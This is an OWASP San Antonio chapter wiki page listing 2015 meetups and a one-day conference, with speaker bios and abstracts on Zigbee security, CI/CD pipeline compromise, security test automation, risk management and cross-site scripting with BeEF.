Bio: David Lister (CISSP, CASP, CCISO, CCNA, CEH, ECSA, CPT, RHCSA, Security+ ) has also been active in various roles involving systems administration, network security, incident response, penetration testing, and application security. David holds a Master's degree in Infrastructure Assurance from the University of Texas San Antonio, and is a member of the ISSA, San Antonio Hackers Anonymous, and OWASP.

Title: Building, Sniffing, and Breaking Zigbee

Abstract:This will be a shallow dive into how you can get up and running with Zigbee, what it is and what it’s used for. Also covered will be some of the known ways to break Zigbee networks, and how this relates to application security.


Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

http://www.meetup.com/OWASP-San-Antonio/events/224725183/


OWASP San Antonio - July 31st @ 11:30am

Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the July 2015 OWASP San Antonio meeting! We will be having a talk about compromising Continuous Integration systems.


Speaker: Greg Anderson

Bio: Greg Anderson works for Rackspace where he helps to drive test automation and security.

Title: Is This Your Pipe? Compromising Build and Automation Pipelines

Abstract: As developers of the web, we rely on tools to automate building code, run tests, and even deploy services. What happens when developers do CI/CD wrong? Credentials get exposed, hijacked, and re-purposed. I'll talk about how often, where, and what happens when people leak public cloud credentials, how some are protecting themselves using encrypted secrets, how to bypass protections against leaking secrets and how to turn someone's Jenkins Install into your own butler. Come hijack credentials out of repositories, steal hidden and encrypted secrets using builds, and hijack infrastructure via continuous integration systems.


Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

http://www.meetup.com/OWASP-San-Antonio/events/223970537/


OWASP San Antonio - June 26th @ 11:30am

Denim Group - 1354 N Loop 1604 E Ste 110, San Antonio, TX

Join us for the June 2015 OWASP San Antonio meeting. We will be having a talk about Continuous Integration and Continuous Deployment (CI/CD) of OpenStack.


Speaker: Michael Xin

Bio: Michael Xin is working as a manager of security engineering in Rackspace. Before that, he worked as a senior application security engineer in Scottrade Inc. Michael is interested in web application / web service / API security, mobile application security and cloud security. Michael has years of experience with application security assessment, security code review and security SDLC.

Title: OpenStack Security CI/CD Way

Abstract: As OpenStack becomes popular, Continuous Integration and Continuous Deployment (CI/CD) of OpenStack is gaining attention. Customers need the ability to deploy multiple times every day to meet their business needs. This is a huge challenge to application security. Traditional web application security testing and API security testing are manual processes aided by various tools. The tests are time consuming and lack consistence. It is almost impossible to embed these types of security testing into CI/CD process.

In Rackspace, security engineering team is working with quality engineers and developers to integrate security testing into CI/CD process. Security engineering team uses the same framework/tool that quality engineer use to ease integration. Currently we are focusing on API security testing automation and web application security testing. We are working on a couple of approaches to integrate security-testing cases with QE testing framework. The security test cases cover necessary security checks including common security vulnerability checks and some product specific checks. These security test cases can be run by anyone from the team. They can also be invoked as Jenkins jobs as part of integration test. The failed security test cases indicate some types of security defects and need to be remediated.

The security testing automation improves the consistency, repeatability and auditability of our security testing process. Security testing within CI/CD process can detect security defect in early stage and reduce remediation costs.

Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

http://www.meetup.com/OWASP-San-Antonio/events/223161579/

The link of the slides: http://www.slideshare.net/michaelxin2015/openstack-security-cicd-way

The links of the tools: https://github.com/stackforge/opencafe https://wiki.openstack.org/wiki/Security/Projects/Bandit


OWASP San Antonio - May 29, 2015 @ 11:30am

Denim Group - 1354 N Loop 1604 E Ste 110, San Antonio, TX

Join us for the May 2015 OWASP San Antonio meeting. We will be having a talk about Mobile Application Security Assessments.

Speaker: Dan Cornell

Bio: A globally recognized application security expert, Dan Cornell holds over 15 years of experience architecting, developing and securing web-based software systems. As Chief Technology Officer and Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies and government organizations integrate security throughout the development process.

Title: Application Security Assessments By The Numbers: A Whole-Istic View

Abstract:

By analyzing the data from over 60 mobile application security assessments, we identify the typical types of mobile vulnerabilities, the system components that contain those vulnerabilities, the components where given types of vulnerabilities cluster, and how to test for each of these. Attendees will learn in the session how to identify these vulnerabilities, how to create and implement an effective mobile security plan, and where to focus their limited testing resources to minimize mobile application portfolio risks. This is critical because automated web application testing tools are able to easily find vulnerabilities while today’s mobile security industry does not offer automated testing tools that can effectively test web services (i.e. the interaction between mobile clients and back-end services.) As a result, best practices for mobile application testing must incorporate significant, often laborious, manual testing. At this point in the presentation, we will use the statistics from the research to define the appropriate manual testing that needs to be implemented.

Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

http://www.meetup.com/OWASP-San-Antonio/events/222536787/


OWASP Invites You to Attend InnoTech San Antonio as our Guest

InnoTech, presented by Presidio, is San Antonio’s premiere IT and security focused conference & expo. We're celebrating eight years of education, technology and networking at this year's event and you won't want to miss it! Mark your calendars now and plan on attending!

Thursday, April 9, 2015 at the Henry B. Gonzalez Convention Center

A limited number of complimentary passes are available for InnoTech San Antonio. Please register at innotechsan.com and use the discount code that you received from your OWASP email list for complimentary admission. Includes coffee, lunch for the first 125 in line and afternoon reception.

Check out the list of speakers and technology demos by visiting http://www.innotechconferences.com/sanantonio/


OWASP San Antonio - March 20th 2015

On March 20th the OWASP San Antonio Chapter is having a FREE one day, single track, conference featuring talks about secure software development, securing the SDLC and application security testing. Whether you’re an information security professional, software developer, or just interested in computer security, anyone and everyone is welcome. We have an all-star set of speakers that will be covering all aspects of managing a security program as well as in depth testing methodologies.

Map:

http://bit.ly/owasp-map

Full Program:

http://bit.ly/owasp-program

Schedule:


9:15 - 9:30 Welcome, Sign-in, kickoff

9:30 - 10:30: Keynote, Scaling an Application Security Program, Glenn Leifheit, Principal Security Architect, Microsoft

One of the largest challenges today is the rapid change in speed of software. We will journey on the path of accelerating but maintaining security, From Small Startup to Largest Enterprise, From Waterfall to Agile. Along the way there will be lessons learned, from successes and failures. What steps can you take to bring security to the next level. Application security is not an easy profession, let’s learn together to take us all to the next level.

About Glenn: Glenn Leifheit is Principal Security Architect for Microsoft Information Technology's ACE (Assessment, Consulting and Engineering) Team. In this role he provides security advice to Microsoft internally as well as external customers. Prior to joining Microsoft, Glenn created, developed and led the application security program for FICO (Fair Isaac Corporation). He also lead FICO’s PCI program. He is also a former co-chair and current member of (ISC)2 Application Security Advisory Council where he helps evangelize for strong application security and advocates for change throughout the industry. Through Glenn's 20 year career in information technology he has focused on security, architecture, OS and middleware design, and operations along with software development. Glenn holds both a CISSP and the CSSLP certifications. He is also passionate about evangelizing security practices to the development community, engaging in over 50 conferences, users groups and code camps as a speaker or panel member. Glenn is also a founding member of TechMasters, a Toastmasters group designed to create a technical speaker community.

10:30 - 11:30: Maximizing Security with Minimal Resources, Chris Maier, Principal Architect, Rackspace

Ever wonder how to intelligently spend your security dollars on the systems that matter most? Are you faced with the common problem of " I don't have an unlimited security budget but I am required to secure all the things"? This session will present concepts, methodologies, and tooling to help you identify your critical systems, set a prescriptive value on your data assets, and rank the systems and information in a way that helps highlight where you should focus your security efforts and dollars. We will also cover how to present this information in a manner that is more business focused, and to ensure that the business understands the risk vs. reward of securing and protecting each of the assets.

About Chris: Chris Maier is a Principal Architect at Rackspace, and in his current role helps design and implement shared infrastructure systems in a secure and compliant manner. Chris has nearly 18 years of production operations experience on a variety of systems including email, identity, databases, directory servers, and a variety of applications servers. Chris has written scripts and code in Bash, VB, Java, C, C++, and a little python for many of the systems he has supported over the years. Because of the 10 plus years spent on identity and authentication systems, Chris is very cognizant of and familiar with a wide variety of security issues and security best practices. Some of Chris' previous positions have included primary DBA for a SOX & PCI compliant billing system, identity infrastructure lead engineer, hosted exchange lead engineer, infrastructure systems lead engineer, and eLearning lead engineer.


11:30 - 12:45: Lunch (provided)

12:45 - 1:45: Convincing Your Management, Your Peers, and Yourself that Risk Management Doesn’t Suck, Josh Sokol, Information Security Program Owner, National Instruments

As security professionals, almost every action we take comes down to making a risk-based decision. Web application vulnerabilities, malware infections, physical vulnerabilities, and much more all boils down to some combination of the likelihood of an event happening and the impact of that event. Risk management is a relatively simple concept to grasp, but the place where many practitioners fall down is in the tool set.

The lucky security professionals work for companies who can afford expensive GRC tools to aide in managing risk. The unlucky majority out there usually end up spending countless hours managing risk via spreadsheets. It's cumbersome, time consuming, and just plain sucks. After starting a Risk Management program from scratch at a $1B/yr company, I ran into these same barriers and where budget wouldn't let me go down the GRC route, I finally decided to do something about it. SimpleRisk is a simple and free tool to perform risk management activities.

Based entirely on open source technologies and sporting a Mozilla Public License 2.0, a SimpleRisk instance can be stood up in minutes and instantly provides the security professional with the ability to submit risks, plan mitigations, facilitate management reviews, prioritize for project planning, and track regular reviews. It is highly configurable and includes dynamic reporting and the ability to tweak risk formulas on the fly. It is under active development with new features being added all the time and can be downloaded for free or demoed at http://www.simplerisk.org. With a simple, powerful, and cost-effective tool and some basic risk management knowledge at your disposal, you too can become the security rock star that your business seeks out for risk-based decision making. Let me show you how to convince your management, your peers, and yourself that Risk Management doesn't suck.

About Josh: Josh Sokol, CISSP, graduated from the University of Texas at Austin with a BS in Computer Science in 2002. Since that time, he has worked for several large companies, including AMD and BearingPoint, spent some time as a military contractor, and is currently employed as the Information Security Program Owner at National Instruments. In his current role, Sokol manages all compliance, security architecture, risk management, and vulnerability management activities for NI. Sokol created the free and open source risk management tool named SimpleRisk, has spoken on dozens of security topics including the much-hyped “HTTPSCan Byte Me” talk at Black Hat 2010, and currently serves on the OWASP Global Board of Directors.


1:45 - 2:45: Automating Security Tests with Selenium, Brady Vitrano, Lead Quality Engineer, Rackspace, Charles Neill, Security Engineer, Rackspace

Rackspace Quality and Security Engineers are building a framework to automate both functional testing and security testing within the browser. To learn about the basics, this presentation looks at our approach to automating functional testing and security testing for web applications. You will learn about Selenium, and how to write some tests of your own. We will also teach you how to run your test cases using a Selenium grid to speed up the testing process.

About Brady: Brady is an aspiring mad scientist.

About Charles: Charles is a Security Developer - Test II for Security Engineering team at Rackspace. He enjoys finding new vulnerabilities in everything from webapps to smart TVs.

The slides download link: https://www.owasp.org/images/4/49/Owasp_automation_talk.pptx


2:45 - 3:45: Making Security as Agile as Development: Adding DevOps and TDD to your security program, Matt Tesauro, Application Security Leader, Pearson

Software and application development are not slowing down. Is your AppSec program able to keep pace? With agile development, continuous deployment, DevOps, and Cloud the pace of change in the software industry has only increased. As as AppSec professional, you face rapidly delivered services while making sure they are built reliably and securely. When you are deploying multiple times a day, there is no time to fit in your traditional week long security assessment.

In this talk will cover how Matt has put these practices in place at Pearson after doing similar work at Rackspace. What are the key ways to keep your AppSec program agile enough to keep up with the pace of change today. Methods will be discussed for securing infrastructure, apps, APIs and source code. Even if you are not in the DevOps, CI/CD world today, you will be soon enough. Its time to embrace the change and say "Challenge Accepted".

About Matt: Matt Tesauro is the Application Security Lead Engineer at Pearson and was previously the Senior Product Security Engineer at Rackspace. He is also an Adjunct Professor for the University of Texas Computer Science department teaching the next generation of CS students about Application Security. Matt is broadly experienced information security professional of 15 years specializing in application and cloud security. He has also presented and provided trainings at various international industry events including DHS Software Assurance Workshop, OpenStack Summit, SANS AppSec Summit, AppSec US, EU and LATAM. His work has included security consulting, penetration testing, threat modeling, code reviews, training and teaching at Texas A&M University. He is a former board member of the OWASP Foundation and project lead for OWASP WTE project, a collection of application security testing tools. He holds two degrees from A&M University and several security and Linux certifications.

3:45 - 4:00: Close


OWASP San Antonio Chapter - Feb 11 2015 @ 11:30am

Come to the first OWASP San Antonio meeting of 2015. We will be having a talk on BeEF - the Browser Exploitation Framework Project and discussing plans for the rest of 2015.

Speaker: Charles Neill

Bio: Charles is a Security Developer at Rackspace, where he does application security for products developed in-house, as well as OpenStack projects and other third-party products. He also develops tools to assist with security testing.

Title: Introduction to Cross-Site Scripting with BeEF

Abstract:

Cross-site scripting is a well-known attack vector at this point, but many people still don't understand the full risk of being vulnerable to it. BeEF is a framework that combines lots of different tools that can be useful to an attacker after finding a cross-site scripting bug in a site. The purpose of this talk is to demonstrate the potential severity of a cross-site scripting attack, leveraging BeEF to trick the user in various ways and to try to get as much useful information out of them as possible.

The slides download link: https://www.owasp.org/images/e/e1/Xss-owasp.pptx

Past Events

https://www.owasp.org/index.php/San_Antonio/pastEvents

Retrieved from "https://wiki.owasp.org/index.php?title=San_Antonio&oldid=244711"